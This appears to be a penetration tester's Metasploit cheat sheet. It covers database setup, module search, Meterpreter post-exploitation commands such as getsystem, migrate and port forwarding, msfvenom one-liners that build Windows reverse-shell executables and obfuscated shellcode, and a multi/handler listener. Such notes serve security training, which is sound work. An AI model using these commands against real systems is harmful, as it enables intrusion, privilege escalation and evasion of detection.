Metasploit

Database

Init Metaspolit database.

sudo msfdb init

Run postgresql service.

sudo systemctl enable postgresql

Workspaces

Change between workspaces for sperating the projects' databases.

workspace -a <workspace_name>

Nmap

db_nmap is a Nmap binary wrapper which saves results into Metasploit's database enables explore results later combined.

hosts - show found hosts and their operating system.

services - show found services and which host runs them.

Search Module

Metasploit module types:

• Exploit Modules: Code to exploit vulnerabilities in systems.

• Payload Modules: Code executed on the target post-exploitation.

• Auxiliary Modules: Tools for scanning and information gathering.

• Post Modules: Actions taken on a compromised system.

• Encoder Modules: Obfuscate payloads to evade detection.

• Nop Generator Modules: Create NOP sleds for buffer overflows.

• Listener Modules: Set up a listener for incoming connections.

search type:<module_type> <module_name>
search <module_name>

Meterpeter

System information

Get system info

sysinfo

Get current user

getuid 

Network

port fowarding

portfwd add -l <lport> -p <port> -r <rhost>

add route to the routing table

route add <subnet>/24 <session_id>

more useful commands

arp # Display the host ARP cache
getproxy # Display the current proxy configuration
ifconfig # Display interfaces ipconfig Display interfaces netstat Display the network connections 
resolve # Resolve a set of host names on the target 

File System

commands with l prefix operate on the local system.

lcd <path>
lcat <file>

meterpeter allows extra file system commands like download or upload files from the local system to the target.

download <target_path> <local_path>
upload <local_path> <target_path>

Channels

channels -l # listing channels
channels -i <channel_id> # use other channel

Meterpeter Post Exploitation

How long the system is in idle which indicates if it's in use.

idletime

Elevate to system using Token impersonation methods automatically.

getsystem

migrating meterpeter process to other process.

migrate <dest_pid>

MSFVenom

Payloads

Search payloads for target platform

msfvenom -l payloads --platform windows --arch x64

Create executable payloads

 # staged
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe
 # not staged
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe -o rev.exe

Generating shell code

msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f powershell -v sc

Generating obfuscated shell code with bad words:

msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Multi Handler

oneliner for multi handler

sudo msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST>;set LPORT <LPORT>;run;"

References

Deep Dive Into Stageless Meterpreter Payloads | Rapid7 BlogRapid7

Metasploit Unleashed - Free Online Ethical Hacking CourseOffSec